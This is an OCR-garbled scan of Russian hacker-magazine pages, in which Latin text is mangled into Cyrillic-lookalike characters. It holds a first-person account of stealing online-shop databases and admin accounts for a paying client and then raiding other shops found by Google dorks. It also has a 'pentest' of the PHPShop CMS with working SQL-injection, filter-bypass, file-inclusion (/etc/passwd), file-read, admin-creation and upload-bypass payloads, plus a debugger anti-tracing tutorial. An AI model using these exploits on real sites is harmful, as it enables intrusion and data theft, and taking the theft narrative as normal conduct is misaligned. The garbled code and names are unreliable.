ковым пассом и уровнем доступа. Кстати, поле ЛІсІАссезз характеризова- 
ло возможные действия (права) пользователя: 

1 . зЪораЫізрІауогсіегз . азр — Бізріау огсіегз 

2 . зЬора_есІікс1ізр1ау . азр?каЫе=сакедогіез — Ѵіем/Брсіаке 
Сакедогіез 

3. з1юра_есІіксіізр1ау .азр?каЫе=ргос!искз — Ѵіем/Брсіаке 
Ргосіиск з 



кккр: //кокктапз . со . га/зііорасітіп. азр 

Выбрав из БД первый аккаунт — тіке:5ѵѵееІ, я успешно залогинился 
в панели управления интернет-магазином. В широком списке раз- 
делов меню особенно порадовала заботливо созданная возмож- 
ность бэкапа данных и просмотра информации о заказах. 

Впрочем, весь файл базы был уже у меня на винте, так что ковы- 
ряние в админке представляло чисто спортивный интерес. Дож- 
давшись заказчика, я передал ему базу совместно с админскими 
аккаунтами и получил обещанный гонорар. Казалось, работа 
сделана и можно спокойно отдыхать. Однако, все самое интересное 
было впереди ! 

Ш МАССОВЫЙ ГРАБЕЖ 

После того, как достаточно простым способом я поимел шоп Ыір :// 
ЬоИтапз.со.га . мне пришла в голову идея поискать интернет-магазы на 
таком же движке. Несмотря на то, что запрос в Гугле вида: 

іпигі : зЬорріпд + іііекуре :т<ЭЪ 

в целом, не дал положительного результата, я все же отрыл несколько 
аналогичных шопов. В качестве примера можно привести ресурс ѵѵѵѵѵѵ. 
таггоіпс.сот . Двиг располагался в каталоге /зЬорріпд и путьдо базы 
выглядел так: 

ѵлкм.таггоіпс . сот/зкорріпд/зкорріпд.тсІЪ 

Выдрав админский аккаунт <<таг2оабтіп:123т20», я без труда зало- 
гинился в панели, но ничего интересного для себя не нашел. Похожая 
ситуация произошла и с шопом ѵѵѵѵѵѵ.ріпзігірергогпо.согп (если не 
считать, что двиг был залит в каталог/доЬаіп). Слив БД с сервера ѵѵѵѵѵѵ. 
ріпзІгірергото.сот/аоЬаіп/зЬорріпд.тсІЬ . я тихо удалился с места 
происшествия. Это далеко не весь перечень сайтов, на которых стояла 
бажная версия шопа. Выкладывать все адреса на блюдечке я не стану, 
кто ищет — тот найдет. 

Несмотря на то, что версия движка на разграбленных шопах была да- 
леко не последней, они все функционировали и имели свои небольшие 
БД со всякими вкусностями. Так что — делай выводы, тг 



ПсІАссезз 
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^ЕЗНОР 



ПОД УДАРОМ 



ЖЕСТКИМ ПЕНТЕСТИНГ ПОПУЛЯРНОГО ДВИЖКА 



новится неинтересно, да и не престижно, ковырять откровенно пионерский 
код топорных движков. Матерых взломщиков тянет на подвиги. Ведь, согла-| 

далеко ходить не надо — достаточно прочитать эту 



продолжение историй багов РНР-программирования, для 
примера и необходимой практики, я постараюсь порвать в 
клочья сайтовый скриптСМ5-шопа. Азаодно слегка подмо- 
чить репутацию РС05А, которой, оказывается, доверяют весьма недурные 
программисты :). 

^ ВМЕСТО ПРЕДИСЛОВИЯ 

Холодным декабрьским утром прошлого года мне в асю стукнул старый 
сетевой знакомый. Он скинул 1)РІ_, где, возможно, жила и здравствовала 
Вііпб 50І_-инъекция. Когда я зашел — открылся движок, который пред- 
ставлял собой СМ5 интернет-магазина «РНРБЬор СМ5» ( ѵѵѵѵѵѵ.рЬрзЬор. 
ги і. Не исключено, что на этом все бы и закончилось, если бы не один 
маленький нюанс, сыгравший на моем самолюбии. Сайтпродукта заявлял 
о прохождении се кур ити -теста движка в некой Богом забытой конторе 
[ рсоза.ги ]. Этого оказалось вполне достаточно для мотивации. Решено 
было провести так называемое «независимое тестирование» 2.1 .8.0 
версии этого движка. 



Щ В НЕДОБРЫЙ ПУТЬ! 

Баги не заставили себя дол го ждать. На первой же странице установ- 
ки стало ясно: здесь будет, что раскопать. Хотя бы потому, что одно из 
обязательных условий работы скрипта — взведенный режим « гедізѣег_ 
д1оЬа1з=0Ы»\ Эта директива таит в себе уйму потенциальных багов и 
строить безопасное приложение на ее основе крайне не рекомендуется. А 
значит, мы можем заставить скрипт не просто работать, а работать на нас. 

Во время установки продукта меня даже не спросили пароль администра- 
тора, из чего можно было предположить, что существует дефолтная связка 
«логин:пароль». Инсталлятор не давал никакого ответа на этот вопрос, 
посему мне пришлось слазить в установочный зці-дамп: 

ІЫЗЕКТ ШТО ' рЪрз1іор_изег8 ' ѴАШЕ5 (1, 0, ' гооД ' , 
'ст9ѵсІА==' , 'шаіІѲрЬрзЬ.ор.ги' , 1) ; 

Как видишь, мы имеем аутентификационную связку «гооі :гооЬ» (никакой 
фантазии у разработчика, — прим. РогЬ]. Собрать списоксайтов сэтим 
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Уязвимый код — Босабоп — отсутствует вызов сііе() 



Уязвимый код — егеді_гер1асе — обход фильтрации 



движком не составило труда — на официальном сайте гордо 
красовался раздел «Наши клиенты». Позже выяснилось 
— околотрети администраторов неудосужились изменить 
пароль. Ктомуже, криптостойкость паролей оставляет желать 
лучшего и завязана лишь на алгоритме Ьазе64. Не просто 
небрежное отношение к безопасности, а прямо-таки плевок в 
сторону криптографии и Брюса Шнаера, в частности! 

Сразу после установки движка и исследования дампа я про- 
верил одну из самых распространенных ошибок при создании 
инсталлятора — его самоудаление. Конечно же, оно отсутс- 
твовало. Почему это важно? Дело в том, что инсталлятор если 
и не удаляется, то хотя бы блокируется, занося специальную 
пометку в БД, в конфиг, какой-либо файл ит.п. Но в некоторых 
случаях можно, так или иначе, обмануть проверку, переставив 
движок заново и войдя в систему под дефолтным/указанным 
при инсталляции пароле. Либо, используя уязвимость записи 
данных в конфиг, можно вписать в него произвольный рбр-код 
и получить веб-шелл. Обычно это имеетсмысл, когда хакера 
не интересует содержание БД сайта; он преследует иные цели 
и заранее знает, как залить шелл, укладывая заботы по реани- 
мации сайта на плечи админа. 

В нашем случае получается полный суповой набор — пациента 
проще пристрелить, чем лечить. Во-первых, в папке конфига 
пежтрЬріпРо () , доступный любому желающему: 

/іпзБаІІ/гемгіЪетосЗБезБ/гетгіБетосІБезІ: .рЬр 

Во-вторых, скриптинсталляцииуязвим кБОБ-инъекции. При 
гедізІег_д1оЬа1з-0Ы хакер может определить неоп- 
ределенную переменную СзѵСопіеп I и выполнить любую 
БОБ-команду! 

/ іпзБаІІ/іпзбаІІ .рЪр?іпз1:а11=2&СзѵСоп1:еп1:=І 
ЫЗЕКТ%2 О І1\ГГО%2 0рЬрзЬ.ор_изегз%2 0ѴАШЕЗ%2 0 ( б б 
6,0, 0x72 666674 , 0хб3бс3.397бб4413с3.3(і, 0x7266667 
4,1) ;%0А2 

Так мы добавляем нового пользователя гооі с паролем гооБ. 

Код /іпзБаІІ/іпзБаІІ .рЬр уязвимый к 3()Ь-ігД : 
іб(@$іпзБа11 == 2) { 



$І(1зАггау2=зр1іР ( " ; \п" , $СзѵСопРепР) ; 
аггау_рор ( $1<ЗзАггау2 ) ; 

ѵгііііе (1ізБ($кеу, $ѵа1) = еаск ( $ІсІзАггау2 ) ) 
$гезиІБ=тузд1_диегу ( $ѵаі ) ; 

В-третих, скриптапдейта версии уязвим клокальному инклуду 
посредством переопределения переменных через ехТгасіО : 

/іпзБаІІ/ирсІаЦе/іпзБаІІ .ркр?5узѴа1ие [ Тііе] [е 
ггог ] /еЦс/раззж! 



Код/іп5ІаІІ/ирс1аІе/іп5ІаІІ.рИр уязвимый к [І_РІ] 

$ЗузѴа1ие=рагзе_іпі_бі1е /рЬрзЬор/іпс/ 
сопбід . іпі " , 1 ) ; 

©ехЦгасБ ($_СЕТ) ; 

©ехЦгасЕ ($_РОЗТ) ; 

©ехЦгасЕ ($_ЕОКМ) ; 

©ехРгасЕ ( $_ЕІЬЕЗ ) ; 



іпсіисіе 

" . $ЗузѴа1ие [ ' Тііе 1 ] [ ' еггог ' ] ) ; 

Между делом я поинтересовался алгоритмом генерации 
сарсба-кода, призванного защищать новостные комменты от 
флудерастов. В реализациях многих публичных алгоритмов 
содержатся ошибки, позволяющие боту прикинуться живым 
человеком. Аты думаешь, откуда берутся всякие скрипты для 
посылки халявных 5М5? 

зеззіоп_зБаг1: ( ) ; 

$ЦехЦ=зиЬзРг (тс15 (зеззіоп_ісІ( ) ) , 0 , 5) ; 

Быстро стало ясным, что такой тестТьюринга обойти просто, 
как два байта. Значение зеззіоп_і6. ( ) поступает напря- 
мую в СООКІЕ: РНРЗЕЗЗІП=зеззіоп_і(И , откуда бот его 
без труда сграбит и, сгенерировав валидный ответ, превра- 
тит новостные комменты в настоящий модераторский ад. 
Спустя некоторое время после просмотра исходников я 
наткнулся на «защиту» от возможных ЗОБ-іпіесбоп. Следу- 
ющий кусок кода вызвал не просто улыбку, а приступ дикого 
смеха: 

// Зесиге Ріх 3 . 0 

бипсбіоп КедиезЬЗеагсЬ ( $зеагс1і) { 
$зеагс1і=егеді_гер1асе ( "ипіоп" , " " , $зеагсЬ) ; 
$зеагс1і=егеді_гер1асе ( " зеіеср " , " " , $зеагс1і) ; 
$зеагс1і=егеді_гер1асе ( "іпзегр" , " " , $зеагс1і) ; 
$зеагс1і=егеді_гер1асе ( "ирсІаЦе" , " " , $зеагс1і) ; 
$зеагс1і=егеді_гер1асе ( "сіеІеЦе" , " " , $зеагс1і) ; 
геЦигп $зеагсЬ; 

} 

Дело в том, что из-за отсутствия рекурсии такой подход беспо- 
лезен. «Вредные» операторы вырезаются однократно, а зна- 
чит, мы можем вложить один оператор в другой и, в результате, 
получить на выходе из фильтра валидный циегу: 

АпЦісЬаЬ ' ипіипіопоп зеізеіесбеср 1,2, 3,4 Ігош 
ЦаЫе_паше/* 

Настало время десерта, то есть ЗОБ! Все файлы движка, кроме 
индексного, были не зазендены. 



взлом 




> іп^о 

• Как правило, при 
переустановке движка 
БДудаляется или пов- 
реждается, поскольку 
не все инсталляторы 
способны менять 
префикс таблиц или 
создавать новую БД. 
Обычно требуется за- 
ранее создать их через 
рЬртуабтіп (до нача- 
ла установки). Также 
конфиг может иметь 
систему а втобэ капа, 

и тогда при создании 
шелла через запись 
в конфигурационный 
файл удастся вернуть 
прежние настройки 
без потери данных. 
Если возможно, то 
сразу после получения 
шелла на сервере, 
хакер, заметая следы, 
восстановит исходный 
конфиг, будто бы ниче- 
го и не случилось. 

• По своему опыту 
могу сказать, что 
зазенденные скрипты 
в 90% случаев имеют 
уязвимости. Подвум 
причинам. Первая 

— скриптзендят не для 
защиты или от кражи, 

а желая скрыть низкое 
качество кода. Вторая 

— зенденный скрипт 
избегаетанализа сор- 
сов другими людьми, а 
тот, кто его раззендит, 
не распространяет 
результаты своих изыс- 
каний. Как следствие 

— наличие скрытых 
багов, которые, поверь 
мне, живуточень 

дол го. 

• Не первый раз 
замечаю, что если 
движок красиво 
выполнен (верстка, 
дизайнДа5Ь,ѵѵеЬ2.0), 
то рбр-код, наверняка, 
кривой. И наоборот :). 
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Пропустив іпсіех . ркр через дезендер, я получил довольно корявый, но 
удобочитаемый листинг. Впечатление портил обфусцированый вид некото- 
рых переменных (видимо, программисты прошлись по ним для страховки). 
Но не суть, главное, что изучение исходника дало возможность отследить 
вызов и передачу параметров уязвимым функциям и накопать нехилую 
кучку инъекций, работоспособных при тадіс_диоі:ез=0РР: 

/іп(іех.рЬ.р?паѵ=1&паше= ' [ЗОЬ] 

/іпбех.рЪр?ІБЪапег= ' [ЗОЬ] 
/іпбех.рЪр?раде=шеба&паѵ=раде&паше= ' [ЗОЬ] 
/іпбех.р]ір?раде=теба&паѵ=раде&пате=петлГ5&іб= ' [ЗОЬ] 

Небольшое отступление: настоятельно рекомендую после установки мало- 
известного движка обязательно проверять утилиты, доступные только ад- 
министратору, на предмет неавторизованного доступа, а также все плаги- 
ны, библиотеки, расширения и пр. Среди них могут попасться самописные 
или устаревшие версии, уязвимые кразличным атакам либо просто криво 
настроенные. Например, [ад.об.Ъ_1іі:е] или [ЕскесІіЪог] . В этотраз 
мне попался бажный скрипт дампера БД /рЪ.рзкор/абтрапе1/б.итрег/ 
Ъаскир/божііоасі . рЬр, читающий любой файл на сервере. Смотри сам: 



<? 



кеасіег ( ' Ьосаііоп: ххх') . Если ты читал мою статью «Роковые ошиб- 
ки РНРѵ2»,то помнишь, что если после локэйшен не поставить ехіі () или 
сІіе() , то рбр-код продолжитсвое выполнение, а браузер проигнорирует 
контент после редиректа, и внешне все будет выглядеть, как надо. Но 
используя что-либо помимо браузера, безразличное кзначениям вхидере, 
можно увидеть остаточный контент. Недолго думая, я полез смотреть функ- 
цию авторизации: 

/рНрзЬор/ас1трапеІ/епІег_1о_асІтіп.рЬр 

бипсбіоп ВабБзег ( ) { 
іб ($бМз->0кР1ад == 0) 
кеабег ( "Ьосабіоп: 

} 

Налицо тот самый случай. Фактически, при доступе в админку нас пускают, 
но редирект мешает нам увидеть желанное. Воспользуемся ІпеЮгаск’ом 
или I пбгисіег’ом , чтобы увидеть остаточный контент ответа. Пошлем такой 
пакет, гдеіб — номер юзверя: 

СЕТ / рЬр збюр / абшрапе 1 / и з ег з / абт_и з ег I Б . ркр ? іб= 1 

НТТР/1 . 0 

Нозб: Іосаібюзб 



іб ( іззеб ( $Ьаскир) ) { 
гедиіге /соппесб .ркр" ) ; 

@тузд1_соппесб ( " $козб " , " $изег_бЪ" , " $разз_бЪ" ) ог @ 
біе ( "Невозможно подсоединиться к базе" ) ; 
тузд1_зе1есб_бЬ ( " $бЪазе" ) ог ©сііе ( "Невозможно подсоеди- 
ниться к базе" ) ; 

гедиіге /епбег_бо_абтіп.р1ір" ) ; 

кеабег( ' Сопбепб-Туре : арріісабіоп/богсе-боѵтіоаб ' ) ; 
кеабег (' Сопбепб-Бізрозібіоп: аббасктепб; бі1епате=" 
Ьаскир. 1 " ' ) ; 

кеабег( ' Сопбепб-Бепдбк: ' . бііезізе ( $Ьаскир) ) ; 
геаббііе ( $Ъаскир) ; 

} 

еізе кеабег ( "Ьосабіоп 



В ответ мы получим страничку админки, на которой отображен профиль 
админа с его логином и паролем в Ьазе64. Для полноты картины отснифаем 
пакет создания нового администратора: 

РОЗТ кббр: //1оса1козб/ркрзкор/абтрапе1/изегз/абт_ 
изегз_петл7.рЬр НТТР/1. 0 
Нозб: Іосаікозб 
.$ Сопбепб-Ьепдбк: 605 

Сопбепб-Туре : тиібірагб /богш-баба ; 

Ьоипбагу = шд4 1 ЕЪдХХб Е192 б59г коЬм 

— шд4ІЕЬдХХбЕ192б592коБ\л7 

Сопбепб-Бізрозібіоп: богш-баба; пате="таі1_пеѵ7" 
абшіп@шаі1 . ги 



?> 

Такой баг проще всего заюзать из браузера через Ы:тІ-форму: 

<богт асбіоп= "кббр : / /багдеб . с от/ ркрзкор/ абшрапе 1/ 
битрег/Ъаскир/боѵтІоаб.ркр" тебкоб=Р05Т > 

<іприб буре="бехб" пате=" Ьаскир" ѵа1ие=" ./іпс/ 
сопбід.іпі" зіге=50> 

<іприб буре="зиЬшіб"> 

</ богш> 

Погоняв движок в браузере, я обратил внимание на довольно частые 
редиректы. Значит, в скриптах используется либо много баѵаЗсгірб, либо 



— шд4ІЕЬдХХбЕ192 б59гкоБ\л7 

Сопбепб-Бізрозібіоп: богш-баба; пате="збабиз_пем" 

0 

— тд4ІЕЪдХХбЕ192 б59гкоЬѵ*7 

Сопбепб-Бізрозібіоп: богш-баба; пате="епаЫеб_пеѵ7" 
1 

— тд4ІЕЪдХХбЕ192 б59гкоЬм 

Сопбепб-Бізрозібіоп: богш-баба; пате= " 1одіп_пем" 
гооб 

— тд4ІЕЬдХХбЕ192 б59гкоБѵ7 

Сопбепб-Бізрозібіоп: богш-баба; пате="раззѵ\гагб_пеѵ7' 
боог 

— тд4ІЕЪдХХбЕ192 б59гкоЬѵ*7 
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Просмотр профайла админа через Іпігисіег 



Чтение произвольного файла 



> Ііпкз 

Чтобы внести 
пропаганду реаль- 
ного аудита, привожу 
несколько ссылок 
на проверенные 
компании, которые 
помогуттебе провести 
жесткий пентест твоих 
движков: 

• Гогит.апбсЬаб 
ги/ГогитІ 1 О.ЫтІ 

• ѵѵѵѵѵѵ.рІзесигНу. 
ги/зегѵ реп.азр 

• Йбеіепсе.ги/сопііепі/ 
ѵіеѵѵ/геѵегзе/ 

• \Л/ѴѴѴѴ.50[ІСІ50І.иІІ0П5. 
ги/сопзиШпд/ 

• ѵѵѵѵѵѵ.ЬеІзес.сот/ 



взлом 



Сопбепб-Біврозібіоп: богт-сіаба; пате="есІібІВ" 
ОК 

— тд4ІЕЬдХХбЕІ92б592коІлл/-- 

Теперь осталось найти надежный способ выполнения про- 
извольного РНР-кода (не считая найденного выше инклуда) 
и — при должном везении — выгрузку в файл через тузці в 
случае Рі1е_ргіѵ-1. 

Подробное изучение админки говорило отом, что загрузки 
файлов, кроме дампов и .сзѵ, вроде как нет. Внимательно 
покопавшись в плагинах, я обнаружил затерянный [к кеб йог], 
возможности которого явно использовались не до конца. 
Поможем раскрыть ему свой потенциал! Способностью к 
загрузке обладает файл соппесІог.рГір по адресу: /рЬрзЬор/ 
а дтрап еі/ейіі: ог2 /есііѣ ог/ Ріі етападег/Ъгомз ег/ 
(іеРаи1ѣ/соппесЬогз/рЪ.р/соппесѣог . рЬр. 

Изучив настройки в конфиге, я осознал, что политика безопас- 
ности настроена по принципу «что не запрещено, то разре- 
шено». Это было очень кстати. Единственным препятствием 
оказались фильтры на расширение: 

1 : $Сопбід [ ' БепіесІЕхбепБІопз ' ] [ ' Рііе 1 ] =аггау 
( ' рЬр ' , ' азр ' , ' азрх ' , ' азсх ' , ' □ зр ' , ' сбт ' , ' сбс ' 

, ' рі ' , ' Ъаб ' , ' ехе ' , 1 <611 ' , ' гед ' ) ; 

2: $роз=збгізбг ($зЕі1еЫаше # "рЬр"); 

3: $роз=збгізбг ( $з0гідіпаІРі1еЫаше , "рЪр"); 

Однако такая проверка весьма сырая и неполная, поскольку 
есть еще убойные расширения «.рІ~йтІ» и «.сді». Для заказыва- 
ния этой бреши мне осталось набросать удобную формочку: 

сбогт асбіоп= "Ъббр : //ІосаІЪозб/рЪрзЪор/ 



абшрапе 1 / есбі бог 2 / есбіб ог / б і 1 ешападег / Ьг омз ег / 
(бебаиІб/соппесбогз/рЬр/соппесбог .ркрРСотта 
п<6=Рі1еІІр1оа(6&Туре=Рі1е&СиггепбРо1(6ег= . / " 
тебЬоскРОЗТ епсбуре= "ши1бірагб/богш-(іаба"> 
<іприб буре="бі1е" пате= ' Ые^РіІе ' > 
сіприб буре= " зиЬтіб " > 

</богт> 

Файлы грузятся в /ПзегРіІез/РіІе/ . Скрипт проводит 
аутентификацию пользователя, потому надо предварительно 
войти под админом. 

г и это все? 

На этом аудит можно закончить. Как видишь, были найдены 
самые разнообразные баги, комбинирование которых позво- 
ляет получить права администратора + веб-шелл. Остается 
только гадать, как все это не было обнаружено при направлен- 
ной зесигйу-проверке, которую проходил двиг. Шутки ради 
я немного подправил копирайтна официальном сайте. Пару 
недель на запрос «йа бажный сайтенг :)» он даже вылазил в 
топ Гугла. 

Метры бажного кода не знают конца и границ, впрочем, как 
и некомпетентность многих программистов в вопросах бе- 
зопасности своих продуктов. Но если подумать — все вполне 
логично. Программер специализируется на вопросах компакт- 
ности, скорости и практической работоспособности своего 
кода, а не на поиске уязвимых мест, пограничных состояний, 
утечек памяти и т.п. Привлечение сторонних специалистов 
— правильный и разумный подход. В конечном итоге это дает 
высокую качественную составляющую всех показателей 
продукта. Правда... не в этот раз. В общем, помни — ты всегда 
можешь заказать мне анализ движка любой сложности.ц-е: 



> СІѴСІ 

Файлы и программы, 
упоминаемые в статье, 
ищи на нашем диске. 




> ѵѵагпіпд 

Внимание! Инфор- 
мация представлена 
исключительно с 
целью ознакомления! 
Ни автор, ни редакция 
за твои действия 
ответственности не 
несет! 




> ѵісіео 

На диске, прилага- 
емом кжурналу, ты 
найдешь видео-урок, 
демонстрирующий 
основные шаги взлом- 
щика. 
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КРИС КАСПЕРСКИ 



ВЗЛОМ 

вин, 



І 



эт 


іиклоп 


ЕДИЯ 


я 


АНТИОТЛАІ 


104 НІ 


ПРИЕМОВ! 





(ТРАССИРОВКА — В ПОГОНЕ НА ТР ИЛИ БЕН НА ВИРАЖА) 



флаг 

(Продолжив наши эксперименты с ТР-битом, мы познакомимся со структур- 
Іными и векторными исключениями, выводящими борьбу с отладчиками в 

а ! ь н а м ва ■мни 

плоскость. Здесь не действу^^щ^шічные законы, и п]^^Ы 
ріпг^^рлго^іі нудно іювырятьс^^едрах 

щт передано управление, и как усмирить разбушевавшуюся защитѣ 



□ тладчики обоих уровней — как ядерно го, так и прикладного 
— совершенно не приспособлены для исследования про- 
грамм, интенсивно использующих структурные исключения 
(они же зІгисЬигев. ехсерііопз, более известные как 
БЕН, где последняя буква досталась в наследство от слова «Ьа псіііпд» 

— обработка]. И хотя ОНуйбд делает некоторые шаги в этом направ- 
лении, без написания собственных скриптов/макросов не обойтись. 
Генерация исключения «телепортирует» нас куда-то внутрь ЫТРЬЬ . БЬЬ, 
в толщу служебного кода, выполняющего поиски передачу управления 
на БЕН-обработчик, который нас интересует больше всего. Как в него 
попасть? Отладчик не дает ответа, а тупая трассировка требует немало 
времени. 

Впрочем, БЕН — это ерунда. Начиная сХР, появилась поддержка обра- 
ботки векторных исключений (ѴЕН), усиленная в 5егѵег2003 и, соответст- 
венно, в Висте/5егѵег2008. Отладчики об этом вообще не знают, открывая 
разработчикам защитогромные возможности для антиоладки и обламывая 
начинающих хакеров косяками. Я покажу, как побороть 5 ЕН/ѴЕН- штучки 
в любом отладчике типа Бувег, БоШСЕ или МіпРЪд. К сожалению, ОІІуйЬд 
содержит грубую ошибку в «движке» и для отладки БЕН/ѴЕН-программ не 
подходит. Ну, не то, чтобы совсем не подходит, но повозиться придется (секс 
будет — и много). 



В5ЕНРІШ0АМЕЫТАІ-5 

Архитектура структурных исключений подробно описана в десятках книг 
и сотнях статей. Настолько подробно, что, читая их, можно уснуть. Поэтому 
краткое изложение основных концепций, выполненное в моем «фирмен- 
ном» стиле, не помешает. 

Исключение, сгенерированное процессором, тутже перехватывается 
ядром операционной системы, которое долго и нудно его мутузит, но, в 
конце концов, возвращаетуправление на прикладной уровень, вызывая 
функцию ЫТБЬЬ . БЬЫ КіІІзегСаІІЬаскОізраІсІіег. При пошаговой 
трассировке отладчики прикладного/ядерного уровня пропускают ядерный 
код, сразу же оказываясь вОТШ/І# . ИЬЫ КіѴзегСаІІЬаскРізраѣскег. 

То есть, при трассировке кодаХОЯ ЕАХ, ЕАХ/МОѴ ЕАХ, [ЕАХ] следующей 
выполняемой командой оказывается первая инструкция функци и ЫТИЬЬ. 
ВЬЫКШзегСаІІЬаскПізраЬсЬег. Сюрприз, да? 

В ходе вы полнен ия КіВзегСаІІЪаскВізраІсЬег извлекаетуказа- 
тель на цепочку обработчиков структурных исключений, хранящийся по 
адресу Е5: [ООООООООЬ] , и вызывает первый обработчик через функцию 
ЕхесиЬеНапб.1ег, передавая ему специальные параметры. 

В зависимости отзначения, возвращенного обработчиком, функция 
КіЦзегСаІІЬаскВізраІсЬег либо продолжает«раскручивать» список 
структурных исключений, либо останавливает«раскрутку», возвращая 



► 0б2 
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управление коду, породившему исключение. Ориентируясь натип исклю- 
чения (ігар или (аиШ, управление передается либо машинной команде, 
сгенерировавшей исключение, либо следующей инструкции (подробнее об 
этом можно прочитать в манулах от Іпіеі]. 

Списокобработчиков структурных исключений представляет собой прос- 
той односвязанный список: 

Формат списка обработчиков структурных исключений 

_ЕХС Е РТ I ОЫ_КЕС 1 3 ТРАТ I (Ж зЬгис 

ргеѵ сісі ? ; // предыдущий 

обработчик, — 1 — конец списка; 

Ъапсііег бб ? ; // указатель 

на ЗЕН-обработчик 
_ЕХС Е РТ I (Ж_КЕО 1 3 ТКАТ I ОЫ епбз 



Во всяком случае, необходимо использовать динамическую загрузку век- 
торных функций, экспортируемых библиотекой КЕШЕЬ32 .ИЬЬ и, если их 
там не окажется, либо выдать сообщение об ошибке, либо дезактивировать 
защитный модуль, работающий на базе ѴЕН. 

Теперь пару слов о новых АРІ-функциях. Абб^ес&огебЕхсерСіолЯалб 
Іег имеет следующий прототип и принимает два параметра, первый из 
которых обычно равен нулю, а второй представляетуказатель на обработ- 
чик векторных исключений: 

Прототип АРІ-функции АсісіѴесІогеііЕхсерІіопНапсІІег, 
добавляющий новый векторный обработчик в список 

РѴОІБ ѴГШАРІ АббѴесбогебЕхсербіопНапбІег ( 

ІЛіОЫС ЕігзбНапбІег , 

РѴЕСТОКЕБ_ЕХСЕРТІОЫ_НАЫБЬЕК ѴесбогебНапбІег ) ; 



Процедура обработки структурных исключений имеет следующий прототип 
и возвращает одно из трех значений : ЕХСЕРТІ0Ы_С0ЫТІШЕ_2ЕАРСН, 
ЕХСЕРТІОЫ_СОЫТІШЕ_ЕХЕСЦТІОЫ ИЛ И ЕХСЕРТІОЫ_ЕХЕСѴТЕ_ 
НАЫРЬЕР, описанные в М30Ы. 



Прототип процедуры-обработчика 
структурных исключений 

Ьапбіег ( РЕХСЕРТ I ОЫ_ЕЕСОКБ рЕхсрбКес , РЕХСЕРТІСЖ_ 
КЕСІЗТКАТІОЫ рЕхсрбКед, 

СОЫТЕХТ * рСопСехС, РѴОІБ 

рБізраРскегСопРехІ: , ЕАКРРОС Ьапбіег) ; 

Обработчики структурных исключений практически полностью реентера- 
бельны — обработчиктакже может генерировать исключения, корректно 
подхватываемые системой и начинающие раскрутку списка обработчиков с 
нуля. «Практически» — потому что, если исключение возникает при попыт- 
ке вызова обработчика (например, из-за исчерпания стека), ядро просто 
молчаливо прибиваетпроцесс. Но это уже дебри технических деталей, в 
которые мы пока не будем углубляться. 

После установки своего собственного обработчика не забывай его снимать, 
иначе есть шанс получить весьма неожиданный результат. Причем, система 
игнорирует попытку снять обработчик внутри самого обработчика, и это 
нужно делать только за пределами его тела. 

Вотабсолютный минимум знаний, который нам понадобится для брачных 
игр со структурными исключениями. 

□ ѴЕНРІЖРАМЕМТАІ-5 

Начиная сХР, появилась поддержка векторных исключений, являющаяся 
разновидностью 5ЕН, однако реализованная независимо отнее и работаю- 
щая параллельно. Другими словами, добавление нового векторного обра- 
ботчика никак не затрагивает ЗЕН-цепочку и, соответственно, наоборот. 
Механизм обработки векторных исключений работает потомуже принципу, 
что и 5ЕН, вызывая уже знакомую нам фу н кц и ю ЫТЕЬЬ . БЬЫ Кі из егСа 1 
ІЪаскРізра^сІаег. В свою очередь она вызывает ЫТБЬЬ.ПЬЫРѢІСаІ 
ІѴесІогесІЕхсерІіопНапсІІегз, раскручивающую список векторных 
обработчиков с последующей передачей управления. 

5ЕН и ѴЕН концептуально очень схожи. Они предоставляютаналогич- 
ные возможности и вся разница между ними в том, что вместо ручного 
манипулирования со списками обработчиковтеперьу нас есть АРІ-функ- 
ции АйбѴес і: огед.Ехсер С і опНапсіІег / РетоѵеѴескогесІЕхсер С і 
опНапйІег, устанавливающие/удаляющие векторные обработчики из 
списка, указатель на который хранится в неэкспортируемой переменной 
_К11рСа11оиІЕпі:гуЫзі : в нутр и ЫТПЬЬ.РЬЬ (по одному экземпляру на 
каждый процесс). Плюс, упростилось написание локальных/глобальных 
обработчиков исключений, что в случае с 5ЕН — большая проблема. Но, по- 
прежнему, векторная обработка придерживается принципа «социального 
кодекса»: все обработчики должны следовать определенным правилам и 
ничто не мешает одному из них объявить себя самым главным и послать 
других нахрен. 

Поскольку 9х/ѴѴ2К системы еще достаточно широко распространены, поль- 
зоваться векторной обработкой без особой на то нужды могуттолько дураки. 



Функция АддУесЪогедЕхсерЫопНапсНег определена в файле ѵііппіа . 
Іа, поставляемом с новыми версиями ЗйК, да и то, только втом случае, если 
в программе определен макрос _ШЮ2_ШШТ со значением 0x0500 или 
большим. Если у нас нетсвежего ЗйК, то определить прототип можно и 
самостоятельно, прямо по месту использования функции. 

Прототип процедуры обработки векторных исключений 

ЬОЫС САЬЬВАСК УесбогебНапсИег ( 

РЕХСЕРТ І(Ж_РОШТЕК8 Ехсербіопіпбо) ; 

Для удаления ранее установленных векторных обработчиков из списка 
можно воспользоваться АРІ-функцией РетоѵеѴесІогесІЕхсерІіопНапд 
Іег, где НапсНег — указатель на обработчик: 

Прототип АРІ-функции РетоѵеѴесІогесІЕхсерІіопНапсІІег, удаляющей 
векторный обработчик из списка 

ТЛіСЖС ІСШАРІ РешоѵеѴес^огесіЕхсербіопНагкіІег ( 

РѴОІБ Напсііег) ; 

^ ЭКСПЕРИМЕНТ #4 — ЛОВЛЯ ТР-БИТА НА 5ЕН 

Продемонстрируем технику отладки программ, использующих структур- 
ные исключения, на примере сгаскте (его сорцы ищи на 0Ѵ0). Он гене- 
рируетобщую ошибку доступа к памяти путем обращения по нулевому 
указателю и проверяетзначение флага трассировки в заранееуста- 
новленном ЗЕН-обработчике. На самом деле, для запутывания хакера 
назначается сразу два обработчика — первый ничего не делает и тупо 



При возникновении исключения (не важно какого) отладчик 011уПЬ§ 
останавливает выполнение программы, предлагая нам нажать 
< 5ЫЛ>Р7/Р8/Р9> для продолжения. Первые две комбинации пере- 
брасывают нас в начало іУТБЬЬ . БЬЬ ! Кі II з егЕхсер I і опВізра С сЪ. 
ег, предоставляя возможность самостоятельно отслеживать момент 
передачи управления на 5ЕН/ѴЕН-обработчик. А < 5ЫЛ>Р9 > выпол- 
няет обработчик на «автопилоте» и останавливает отладчик только 
на выходе из него. В случае двух наших сгаскте это будет команда, 
расположенная непосредственно за то ѵ еах, [ еах ] . 

Сказанное справедливо только, когда флаг трассировки сброшен, и 
программа выполнялась по Кип (или Зіер Оѵег с генерацией исклю- 
чения внутри оѵег-функции) . Если же флаг трассировки был взведен 
(программа исполнялась в пошаговом режиме) , то при выходе из 
обработчика структурного/векторного исключения, 011у0Ь§ из-за 
ошибки в «движке» передает программе трассировочное исключение 
ІЫТ 011а, вызывая обработчик повторно. В нашем случае это приво- 
дит к увеличению регистра ЕІР еще на два байта и, как следствие, к 
